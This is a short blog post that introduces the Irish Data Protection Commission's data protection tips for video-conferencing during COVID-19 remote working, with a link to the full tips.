• Data Protection Tips for Video-conferencing. By the Data Protection Commission Ireland. In light of the recent increase in remote working, necessitated by COVID-19 mitigation measures, as well as the increased numbers keeping in touch online with friends and family, the number of people video-conferencing and video-calling has increased dramatically. This has also resulted in people using apps and services which they might not have used before, or are now using for different reasons – ie using an app they usually use for personal purposes now for work purposes or vice versa. Concerns have been raised about how to use these technologies to keep in touch with colleagues and loved ones in a way that is safe and secure, and ensures an adequate standard of data protection.Here are some tips to help both individuals and organizations (such as employers who might introduce new or increased videoconferencing arrangements for employees) use these services in a safe manner:https://lnkd.in/e8mpd8n

This work is licensed under a  Creative Commons Attribution 4.0 International License .POSTED IN: CONSENT , DATA PROTECTION , GDPR , PRIVACY , PRIVACY NOTICE , TARA TAUBMAN-BASSIRIAN FILED UNDER: VIDEO-CONFERENCING , ZOOM

Photo by Geoff Lowe